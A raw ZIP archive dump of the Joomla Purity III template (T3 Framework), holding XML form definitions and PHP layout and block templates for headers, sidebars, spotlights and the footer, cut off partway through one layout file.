lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\�5Ѫ**(purity_iii/etc/extrafields/portfolio.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<form>
<fields name="attribs">
    <fieldset name="extra-fields" label="TPL_GROUP_EXTRA_FIELDS_LABEL" description="TPL_GROUP_EXTRA_FIELDS_DESC" group="extrafields">
        <field name="portfolio-state" type="list" default="" label="TPL_EXTRAFIELDS_PORTFOLIO_STATE_LABEL"
               description="TPL_EXTRAFIELDS_PORTFOLIO_STATE_DESC">
            <option value="">None</option>
            <option value="current">Current</option>
            <option value="hot">Hot</option>
            <option value="free">Free</option>
        </field>
        <field name="portfolio-demo" type="text" class="input-xxlarge" default="" label="TPL_EXTRAFIELDS_PORTFOLIO_DEMO_LABEL" description="TPL_EXTRAFIELDS_PORTFOLIO_DEMO_DESC" />
    </fieldset>
</fields>
</form>PKԜ�\����--&purity_iii/etc/form/com_menus.item.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<form>
    <fields name="params">
        <fieldset name="page-options" label="Page Display" description="Page Display Description">
            <field name="masthead-title" type="text" default="" label="TPL_MENU_ITEM_MASTHEAD_TITLE_LABEL" description="TPL_MENU_ITEM_MASTHEAD_TITLE_DESC" />
            <field name="masthead-slogan" type="textarea" default="" label="TPL_MENU_ITEM_MASTHEAD_SLOGAN_LABEL" description="TPL_MENU_ITEM_MASTHEAD_SLOGAN_DESC" filter="RAW" />
        </fieldset>
    </fields>
</form>PKԜ�\�;hÁ�+purity_iii/etc/form/com_content.article.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<form>
<fields name="attribs">
    <fieldset name="extra-fields" label="TPL_GROUP_EXTRA_FIELDS_LABEL" description="TPL_GROUP_EXTRA_FIELDS_DESC" group="extrafields">
        <field name="extra-class" type="text" default="" label="TPL_ARTICLE_EXTRA_CLASS_LABEL" description="TPL_ARTICLE_EXTRA_CLASS_DESC" />
    </fieldset>
</fields>
</form>PKԜ�\�*�W��purity_iii/etc/assets.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<assets>
	<scripts>
		<file>js/script.js</file>
	</scripts>
	
	<stylesheets>
		<file>fonts/font-awesome/css/font-awesome.min.css</file>
	</stylesheets>
	
</assets>PKԜ�\$Gexxpurity_iii/tpls/blog.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

$responsive = $this->getParam('responsive', 1);
$resClass = "";
if ($responsive==0){
	$resClass = "no-responsive";
}

defined('_JEXEC') or die;
?>

<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"
	  class='<jdoc:include type="pageclass" /> <?php echo $resClass ?>'>

<head>
	<jdoc:include type="head" />
	<?php $this->loadBlock('head') ?>
	<?php $this->addCss('layouts/blog') ?>
</head>

<body>

<div class="t3-wrapper blog"> <!-- Need this wrapper for off-canvas menu. Remove if you don't use of-canvas -->

	<?php $this->loadBlock('header') ?>

	<?php $this->loadBlock('mainbody') ?>

	<?php $this->loadBlock('footer') ?>

</div>


</body>
</html>PKԜ�\o�M�00purity_iii/tpls/corporate.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

$responsive = $this->getParam('responsive', 1);
$resClass = "";
if ($responsive==0){
	$resClass = "no-responsive";
}

defined('_JEXEC') or die;
?>

<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"
	  class='<jdoc:include type="pageclass" /> <?php echo $resClass ?>'>

<head>
	<jdoc:include type="head" />
	<?php $this->loadBlock('head') ?>
	<?php $this->addCss('layouts/corporate') ?>
</head>

<body>

<div class="t3-wrapper corporate"> <!-- Need this wrapper for off-canvas menu. Remove if you don't use of-canvas -->

	<?php $this->loadBlock('header') ?>

  <?php $this->loadBlock('slideshow') ?>

  <?php $this->loadBlock('spotlight-1') ?>

	<?php $this->loadBlock('mainbody') ?>

  <?php $this->loadBlock('spotlight-2') ?>

  <?php $this->loadBlock('spotlight-3') ?>

	<?php $this->loadBlock('footer') ?>

</div>


</body>
</html>PKԜ�\A��vv$purity_iii/tpls/features-intro-1.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

$responsive = $this->getParam('responsive', 1);
$resClass = "";
if ($responsive==0){
	$resClass = "no-responsive";
}

defined('_JEXEC') or die;
?>

<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"
	  class='<jdoc:include type="pageclass" /> <?php echo $resClass ?>'>

<head>
	<jdoc:include type="head" />
	<?php $this->loadBlock('head') ?>
</head>

<body>

<div class="t3-wrapper features-intro features-intro-1"> <!-- Need this wrapper for off-canvas menu. Remove if you don't use of-canvas -->

	<?php $this->loadBlock('header') ?>

	<?php $this->loadBlock('mainbody/full-width') ?>

	<?php $this->loadBlock('footer') ?>

</div>


</body>
</html>PKԜ�\��8���)purity_iii/tpls/default-content-right.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

$responsive = $this->getParam('responsive', 1);
$resClass = "";
if ($responsive==0){
	$resClass = "no-responsive";
}

defined('_JEXEC') or die;
?>

<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"
	  class='<jdoc:include type="pageclass" /> <?php echo $resClass ?>'>

<head>
	<jdoc:include type="head" />
	<?php $this->loadBlock('head') ?>
</head>

<body>

<div class="t3-wrapper"> <!-- Need this wrapper for off-canvas menu. Remove if you don't use of-canvas -->

  <?php $this->loadBlock('header') ?>

  <?php $this->loadBlock('spotlight-1') ?>

  <?php $this->loadBlock('mainbody-content-right') ?>

  <?php $this->loadBlock('spotlight-2') ?>

  <?php $this->loadBlock('navhelper') ?>

  <?php $this->loadBlock('footer') ?>

</div>

</body>

</html>PKԜ�\8B�6��purity_iii/tpls/docs.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

$responsive = $this->getParam('responsive', 1);
$resClass = "";
if ($responsive==0){
	$resClass = "no-responsive";
}

defined('_JEXEC') or die;
?>

<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>"
	  class='<jdoc:include type="pageclass" /> <?php echo $resClass ?>'>

<head>
	<jdoc:include type="head" />
	<?php $this->loadBlock('head') ?>
	<?php $this->addCss('layouts/docs') ?>
  <?php $this->addScript(T3_TEMPLATE_URL.'/js/holder.js'); ?>
</head>

<body>

<div class="t3-wrapper docs"> <!-- Need this wrapper for off-canvas menu. Remove if you don't use of-canvas -->

	<?php $this->loadBlock('header') ?>

	<?php $this->loadBlock('mainbody') ?>

	<?php $this->loadBlock('footer') ?>

</div>


</body>
</html>PKԜ�\�o�0��!purity_iii/tpls/blocks/header.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// get params
$sitename  = $this->params->get('sitename');
$slogan    = $this->params->get('slogan', '');
$logotype  = $this->params->get('logotype', 'text');
$logoimage = $logotype == 'image' ? $this->params->get('logoimage', 'templates/' . T3_TEMPLATE . '/images/logo.png') : '';
$logoimgsm = ($logotype == 'image' && $this->params->get('enable_logoimage_sm', 0)) ? $this->params->get('logoimage_sm', '') : false;

if (!$sitename) {
	$sitename = JFactory::getConfig()->get('sitename');
}

?>

<!-- MAIN NAVIGATION -->
<header id="t3-mainnav" class="wrap navbar navbar-default navbar-fixed-top t3-mainnav">

	<!-- OFF-CANVAS -->
	<?php if ($this->getParam('addon_offcanvas_enable')) : ?>
		<?php $this->loadBlock ('off-canvas') ?>
	<?php endif ?>
	<!-- //OFF-CANVAS -->

	<div class="container">

		<!-- NAVBAR HEADER -->
		<div class="navbar-header">

			<!-- LOGO -->
			<div class="logo logo-<?php echo $logotype ?>">
				<div class="logo-<?php echo $logotype, ($logoimgsm ? ' logo-control' : '') ?>">
					<a href="<?php echo JURI::base(true) ?>" title="<?php echo strip_tags($sitename) ?>">
						<?php if($logotype == 'image'): ?>
							<img class="logo-img" src="<?php echo JURI::base(true) . '/' . $logoimage ?>" alt="<?php echo strip_tags($sitename) ?>" />
						<?php endif ?>

						<?php if($logoimgsm) : ?>
							<img class="logo-img-sm" src="<?php echo JURI::base(true) . '/' . $logoimgsm ?>" alt="<?php echo strip_tags($sitename) ?>" />
						<?php endif ?>
						
						<span><?php echo $sitename ?></span>
					</a>
				</div>
			</div>
			<!-- //LOGO -->

			<?php if ($this->getParam('navigation_collapse_enable', 1) && $this->getParam('responsive', 1)) : ?>
				<?php $this->addScript(T3_URL.'/js/nav-collapse.js'); ?>
				<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".t3-navbar-collapse">
					<i class="fa fa-bars"></i>
				</button>
			<?php endif ?>

	    <?php if ($this->countModules('head-search')) : ?>
	    <!-- HEAD SEARCH -->
	    <div class="head-search<?php $this->_c('head-search')?>">     
	      <jdoc:include type="modules" name="<?php $this->_p('head-search') ?>" style="raw" />
	    </div>
	    <!-- //HEAD SEARCH -->
	    <?php endif ?>

		</div>
		<!-- //NAVBAR HEADER -->

		<!-- NAVBAR MAIN -->
		<?php if ($this->getParam('navigation_collapse_enable')) : ?>
		<nav class="t3-navbar-collapse navbar-collapse collapse"></nav>
		<?php endif ?>

		<nav class="t3-navbar navbar-collapse collapse">
			<jdoc:include type="<?php echo $this->getParam('navigation_type', 'megamenu') ?>" name="<?php echo $this->getParam('mm_type', 'mainmenu') ?>" />
		</nav>
    <!-- //NAVBAR MAIN -->

	</div>
</header>
<!-- //MAIN NAVIGATION -->

<?php $this->loadBlock ('masthead') ?>PKԜ�\���mm%purity_iii/tpls/blocks/off-canvas.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>
<?php
	if (!$this->getParam('addon_offcanvas_enable')) return ;
?>

<button class="btn btn-default off-canvas-toggle <?php $this->_c('off-canvas') ?>" type="button" data-pos="left" data-nav="#t3-off-canvas" data-effect="<?php echo $this->getParam('addon_offcanvas_effect', 'off-canvas-effect-4') ?>">
  <i class="fa fa-bars"></i>
</button>

<!-- OFF-CANVAS SIDEBAR -->
<div id="t3-off-canvas" class="t3-off-canvas <?php $this->_c('off-canvas') ?>">

  <div class="t3-off-canvas-header">
    <h2 class="t3-off-canvas-header-title"><?php echo JText::_('TPL_OFF_CANVAS_HEADER_TITLE'); ?></h2>
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
  </div>

  <div class="t3-off-canvas-body">
    <jdoc:include type="modules" name="<?php $this->_p('off-canvas') ?>" style="T3Xhtml" />
  </div>

</div>
<!-- //OFF-CANVAS SIDEBAR -->
PKԜ�\S(p��#purity_iii/tpls/blocks/masthead.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
$input = JFactory::getApplication()->input;
$menu = JFactory::getApplication()->getMenu();
$activemenu = $menu->getActive() ? $menu->getActive() : $menu->getDefault();
$query = $activemenu->query;
$activemenuParams = version_compare(JVERSION,"4",'ge') ? $activemenu->getParams() : $activemenu->params;
$mast_title = $mast_slogan = '';
if ((!isset ($query['option']) || $query['option'] == $input->get ('option'))
		&& (!isset ($query['view']) || $query['view'] == $input->get ('view'))
		&& (!isset ($query['id']) || $query['id'] == $input->get ('id'))) {
	$mast_title = $activemenuParams->get ('masthead-title');
	$mast_slogan = $activemenuParams->get ('masthead-slogan');
}

$masthead_position = 'masthead';
?>

<?php if ($mast_title || $this->countModules($masthead_position)) : ?>
<div class="page-masthead">
	<?php if ($mast_title) : ?>
	<div class="jumbotron jumbotron-primary">
		<div class="container">
			<h1><?php echo $mast_title ?></h1>
			<p><?php echo $mast_slogan ?></p>
		</div>
	</div>
	<?php endif ?>

	<?php if ($this->countModules ($masthead_position)): ?>
		<jdoc:include type="modules" name="<?php echo $masthead_position ?>" style="FeatureRow" />
	<?php endif ?>
</div>
<?php endif ?>

PKԜ�\�̆��0purity_iii/tpls/blocks/mainbody-content-left.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

if (is_array($this->getParam('skip_component_content')) && 
  in_array(JFactory::getApplication()->input->getInt('Itemid'), $this->getParam('skip_component_content'))) 
return;
?>

<?php
/**
 * Mainbody 3 columns, content in left, mast-col on top of 2 sidebars: content - sidebar1 - sidebar2
 */

// positions configuration
$mastcol  = 'mast-col';
$sidebar1 = 'sidebar-1';
$sidebar2 = 'sidebar-2';

$mastcol  = $this->countModules($mastcol)  ? $mastcol  : false;
$sidebar1 = $this->countModules($sidebar1) ? $sidebar1 : false;
$sidebar2 = $this->countModules($sidebar2) ? $sidebar2 : false;

if ($sidebar1 && $sidebar2) {
	$this->loadBlock('mainbody/two-sidebar-right', array('sidebar1' => $sidebar1, 'sidebar2' => $sidebar2, 'mastcol' => $mastcol));
} elseif ($mastcol && ($sidebar1 || $sidebar2)) {
	$this->loadBlock('mainbody/one-sidebar-right-with-mastcol', array('sidebar' => $sidebar1 ? $sidebar1 : $sidebar2, 'mastcol' => $mastcol));
} elseif ($sidebar1 || $sidebar2) {
	$this->loadBlock('mainbody/one-sidebar-right', array('sidebar' => $sidebar1 ? $sidebar1 : $sidebar2));
} else {
	$this->loadBlock('mainbody/no-sidebar');
}

//should we show mastcol when there was no sidebar
?>

PKԜ�\�$m��$purity_iii/tpls/blocks/slideshow.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<?php if ($this->countModules('slideshow')) : ?>
<!-- SLIDESHOW -->
<div class="slideshow hidden-xs <?php $this->_c('slideshow') ?>">
	<jdoc:include type="modules" name="<?php $this->_p('slideshow') ?>" style="raw" />
</div>
<!-- //SLIDESHOW -->
<?php endif ?>PKԜ�\G��_MM&purity_iii/tpls/blocks/spotlight-1.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<?php if ($this->checkSpotlight('spotlight-1', 'position-1, position-2, position-3, position-4')) : ?>
	<!-- SPOTLIGHT 1 -->
	<div class="wrap t3-sl t3-sl-1">
    <div class="container">
  		<?php $this->spotlight('spotlight-1', 'position-1, position-2, position-3, position-4') ?>
    </div>
	</div>
	<!-- //SPOTLIGHT 1 -->
<?php endif ?>PKԜ�\&�VV#purity_iii/tpls/blocks/mainbody.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

if (is_array($this->getParam('skip_component_content')) && 
  in_array(JFactory::getApplication()->input->getInt('Itemid'), $this->getParam('skip_component_content'))) 
return;
?>

<?php

/**
 * Mainbody 3 columns, content in center: sidebar1 - content - sidebar2
 */

// positions configuration
$sidebar1 = 'sidebar-1';
$sidebar2 = 'sidebar-2';

$sidebar1 = $this->countModules($sidebar1) ? $sidebar1 : false;
$sidebar2 = $this->countModules($sidebar2) ? $sidebar2 : false;

// detect layout
if ($sidebar1 && $sidebar2) {
	$this->loadBlock('mainbody/two-sidebar', array('sidebar1' => $sidebar1, 'sidebar2' => $sidebar2));
} elseif ($sidebar1) {
	$this->loadBlock('mainbody/one-sidebar-left', array('sidebar' => $sidebar1));
} elseif ($sidebar2) {
	$this->loadBlock('mainbody/one-sidebar-right', array('sidebar' => $sidebar2));
} else {
	$this->loadBlock('mainbody/no-sidebar');
}
PKԜ�\1��+purity_iii/tpls/blocks/features-intro-2.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<?php if ($this->countModules('features-intro-2')) : ?>
<!-- SLIDESHOW -->
<div class="features-intro <?php $this->_c('features-intro-2') ?>">
	<jdoc:include type="modules" name="<?php $this->_p('features-intro-2') ?>" style="FeatureRow" />
</div>
<!-- //SLIDESHOW -->
<?php endif ?>PKԜ�\��d���1purity_iii/tpls/blocks/mainbody-content-right.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */


defined('_JEXEC') or die;
if (is_array($this->getParam('skip_component_content')) && 
  in_array(JFactory::getApplication()->input->getInt('Itemid'), $this->getParam('skip_component_content'))) 
return;
?>

<?php

// positions configuration
$mastcol  = 'mast-col';
$sidebar1 = 'sidebar-1';
$sidebar2 = 'sidebar-2';

$mastcol  = $this->countModules($mastcol)  ? $mastcol  : false;
$sidebar1 = $this->countModules($sidebar1) ? $sidebar1 : false;
$sidebar2 = $this->countModules($sidebar2) ? $sidebar2 : false;

if ($sidebar1 && $sidebar2) {
	$this->loadBlock('mainbody/two-sidebar-left', array('sidebar1' => $sidebar1, 'sidebar2' => $sidebar2, 'mastcol' => $mastcol));
} elseif ($mastcol && ($sidebar1 || $sidebar2)) {
	$this->loadBlock('mainbody/one-sidebar-left-with-mastcol', array('sidebar' => $sidebar1 ? $sidebar1 : $sidebar2, 'mastcol' => $mastcol));
} elseif ($sidebar1 || $sidebar2) {
	$this->loadBlock('mainbody/one-sidebar-left', array('sidebar' => $sidebar1 ? $sidebar1 : $sidebar2));
} else {
	$this->loadBlock('mainbody/no-sidebar');
}

?>
PKԜ�\Z1�MM&purity_iii/tpls/blocks/spotlight-2.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<?php if ($this->checkSpotlight('spotlight-2', 'position-5, position-6, position-7, position-8')) : ?>
	<!-- SPOTLIGHT 2 -->
	<div class="wrap t3-sl t3-sl-2">
    <div class="container">
  		<?php $this->spotlight('spotlight-2', 'position-5, position-6, position-7, position-8') ?>
    </div>
	</div>
	<!-- //SPOTLIGHT 2 -->
<?php endif ?>PKԜ�\Pr�purity_iii/tpls/blocks/head.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<!-- META FOR IOS & HANDHELD -->
<?php if ($this->getParam('responsive', 1)): ?>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
	<style type="text/stylesheet">
		@-webkit-viewport   { width: device-width; }
		@-moz-viewport      { width: device-width; }
		@-ms-viewport       { width: device-width; }
		@-o-viewport        { width: device-width; }
		@viewport           { width: device-width; }
	</style>
	<script type="text/javascript">
		//<![CDATA[
		if (navigator.userAgent.match(/IEMobile\/10\.0/)) {
			var msViewportStyle = document.createElement("style");
			msViewportStyle.appendChild(
				document.createTextNode("@-ms-viewport{width:auto!important}")
			);
			document.getElementsByTagName("head")[0].appendChild(msViewportStyle);
		}
		//]]>
	</script>
<?php endif ?>
<meta name="HandheldFriendly" content="true"/>
<meta name="apple-mobile-web-app-capable" content="YES"/>
<!-- //META FOR IOS & HANDHELD -->

<?php
if (version_compare(JVERSION, '4.0', 'lt')) {
// SYSTEM CSS
$this->addStyleSheet(JURI::base(true) . '/templates/system/css/system.css');
}
?>

<?php
// T3 BASE HEAD
$this->addHead();
?>

<?php
// CUSTOM CSS
if (is_file(T3_TEMPLATE_PATH . '/css/custom.css')) {
	$this->addStyleSheet(T3_TEMPLATE_URL . '/css/custom.css');
}
?>

<!-- Le HTML5 shim and media query for IE8 support -->
<!--[if lt IE 9]>
<script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script>
<script type="text/javascript" src="<?php echo T3_URL ?>/js/respond.min.js"></script>
<![endif]-->

<!-- You can add Google Analytics here or use T3 Injection feature -->

<!--[if lt IE 9]>
<link rel="stylesheet" href="<?php echo T3_TEMPLATE_URL ?>/css/ie8.css" type="text/css" />
<![endif]-->PKԜ�\�����$purity_iii/tpls/blocks/navhelper.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<!-- NAV HELPER -->
<nav class="wrap t3-navhelper <?php $this->_c('navhelper') ?>">
	<div class="container">
		<jdoc:include type="modules" name="<?php $this->_p('navhelper') ?>" />
	</div>
</nav>
<!-- //NAV HELPER -->PKԜ�\&!7"�
�
!purity_iii/tpls/blocks/footer.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<!-- BACK TOP TOP BUTTON -->
<div id="back-to-top" data-spy="affix" data-offset-top="300" class="back-to-top hidden-xs hidden-sm affix-top">
  <button class="btn btn-primary" title="<?php echo JText::_('TPL_PURITY_III_BACKTOTOP'); ?>"><i class="fa fa-caret-up"></i></button>
</div>
<script type="text/javascript">
(function($) {
	// Back to top
	$('#back-to-top').on('click', function(){
		$("html, body").animate({scrollTop: 0}, 500);
		return false;
	});
    $(window).on('load', function(){
        // hide button to top if the document height not greater than window height*2;using window load for more accurate calculate.    
        if ((parseInt($(window).height())*2)>(parseInt($(document).height()))) {
            $('#back-to-top').hide();
        } 
    });
})(jQuery);
</script>
<!-- BACK TO TOP BUTTON -->

<!-- FOOTER -->
<footer id="t3-footer" class="wrap t3-footer">

	<?php if ($this->checkSpotlight('footer-sl', 'footer-1, footer-2, footer-3, footer-4, footer-5, footer-6')) : ?>
		<!-- FOOTER SPOTLIGHT -->
		<div class="container hidden-xs">
			<?php $this->spotlight('footer-sl', 'footer-1, footer-2, footer-3, footer-4, footer-5, footer-6') ?>
		</div>
		<!-- //FOOTER SPOTLIGHT -->
	<?php endif ?>

	<section class="t3-copyright">
		<div class="container">
			<div class="row">
				<div class="<?php echo $this->getParam('t3-rmvlogo', 1) ? 'col-md-8' : 'col-md-12' ?> copyright <?php $this->_c('footer') ?>">
					<jdoc:include type="modules" name="<?php $this->_p('footer') ?>" />
          <small>
            <a href="http://twitter.github.io/bootstrap/" title="Bootstrap by Twitter" target="_blank">Bootstrap</a> is a front-end framework of Twitter, Inc. Code licensed under <a href="https://github.com/twbs/bootstrap/blob/master/LICENSE" title="MIT License" target="_blank">MIT License.</a>
          </small>
          <small>
            <a href="http://fortawesome.github.io/Font-Awesome/" target="_blank">Font Awesome</a> font licensed under <a href="http://scripts.sil.org/OFL">SIL OFL 1.1</a>.
          </small>
				</div>
				<?php if ($this->getParam('t3-rmvlogo', 1)): ?>
					<div class="col-md-4 poweredby text-hide">
						<a class="t3-logo t3-logo-color" href="http://t3-framework.org" title="Powered By T3 Framework"
						   target="_blank" <?php echo method_exists('T3', 'isHome') && T3::isHome() ? '' : 'rel="nofollow"' ?>>Powered by <strong>T3 Framework</strong></a>
					</div>
				<?php endif; ?>
			</div>
		</div>
	</section>

</footer>
<!-- //FOOTER -->PKԜ�\m%��SS&purity_iii/tpls/blocks/spotlight-3.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<?php if ($this->checkSpotlight('spotlight-3', 'position-9, position-10, position-11, position-12')) : ?>
	<!-- SPOTLIGHT 2 -->
	<div class="wrap t3-sl t3-sl-3">
    <div class="container">
		  <?php $this->spotlight('spotlight-3', 'position-9, position-10, position-11, position-12') ?>
    </div>
	</div>
	<!-- //SPOTLIGHT 2 -->
<?php endif ?>PKԜ�\���{{)purity_iii/tpls/blocks/features-intro.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<?php

/**
 * Mainbody 3 columns, content in center: sidebar1 - content - sidebar2
 */

// detect layout
$this->loadBlock('mainbody/full-width');

PKԜ�\��Bʹ�,purity_iii/tpls/blocks/mainbody/magazine.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Mainbody 1 columns, content only
 */
?>

<div id="t3-mainbody" class="container t3-mainbody">
	<div class="row">

		<!-- MAIN CONTENT -->
		<div id="t3-content" class="t3-content col-xs-12">

			<?php if($this->hasMessage()) : ?>
			<jdoc:include type="message" />
			<?php endif ?>

			<jdoc:include type="component" />

			<?php if ($this->countModules('magazine-featured')): ?>
			<jdoc:include type="modules" name="<?php $this->_p('magazine-featured') ?>" style="raw" />
			<?php endif ?>

			<?php if ($this->countModules('magazine-articles')): ?>
			<jdoc:include type="modules" name="<?php $this->_p('magazine-articles') ?>" style="raw" />
			<?php endif ?>

		</div>
		<!-- //MAIN CONTENT -->

	</div>
</div> PKԜ�\y�OOBpurity_iii/tpls/blocks/mainbody/one-sidebar-right-with-mastcol.phpnu&1i�<?php
/**
 * @package   T3 Blank
 * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license   GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Mainbody 2 columns: content - sidebar
 */
?>
<div id="t3-mainbody" class="container t3-mainbody">
	<div class="row">

		<!-- MAIN CONTENT -->
		<div id="t3-content" class="t3-content col-xs-12 col-sm-8  col-md-9">
			<?php if($this->hasMessage()) : ?>
			<jdoc:include type="message" />
			<?php endif ?>
			<jdoc:include type="component" />
		</div>
		<!-- //MAIN CONTENT -->

		<div class="t3-sidebar t3-sidebar-right col-xs-12 col-sm-4  col-md-3">
			<div class="row">

				<!-- MASSCOL 1 -->
				<?php if ($vars['mastcol']) : ?>
					<div class="t3-mastcol t3-mastcol-1 <?php $this->_c($vars['mastcol']) ?>">
						<jdoc:include type="modules" name="<?php $this->_p($vars['mastcol']) ?>" style="T3Xhtml" />
					</div>
				<?php endif ?>
				<!-- //MASSCOL 1 -->

				<!-- SIDEBAR RIGHT -->
				<?php if ($vars['sidebar']) : ?>
				<div class="t3-sidebar col-xs-12 col-sm-4  col-md-3 <?php $this->_c($vars['sidebar']) ?>">
					<jdoc:include type="modules" name="<?php $this->_p($vars['sidebar']) ?>" style="T3Xhtml" />
				</div>
				<?php endif ?>
				<!-- //SIDEBAR RIGHT -->
				
			</div>
		</div>

	</div>
